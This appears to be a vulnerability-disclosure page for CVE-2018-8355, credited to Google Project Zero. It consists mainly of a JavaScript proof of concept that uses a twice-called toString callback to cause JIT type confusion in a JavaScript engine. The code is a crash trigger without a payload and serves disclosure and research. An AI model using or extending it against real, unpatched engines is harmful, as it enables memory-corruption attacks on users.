Skip to content

Latest commit

 

History

History
51 lines (36 loc) · 1.06 KB

CVE-2018-8355.md

File metadata and controls

51 lines (36 loc) · 1.06 KB
Raw

CVE-2018-8355

  • Fix: Aug 2018
  • Credit: lokihardt of Google Project Zero

PoC

function opt(arr, s) {
    arr[0] = 1.1;

    if (s !== null) {
        let tmp = 'a'.localeCompare(s);
    }

    arr[0] = 2.3023e-320;
}

function main() {
    let arr = [1.1];

    for (let i = 0; i < 100; i++) {
        'a'.localeCompare('x', []);  // Optimize the JavaScript localeCompare

        opt(arr, null);  // for profiling all instructions in opt.

        try {
            opt(arr, {toString: () => {
                throw 1;  // Don't profile "if (locales === undefined && options === undefined) {"
            }});
        } catch (e) {

        }
    }

    opt(arr, {toString: () => {
        // Called twice
        arr[0] = {};
    }});

    print(arr);
}

main();

Reference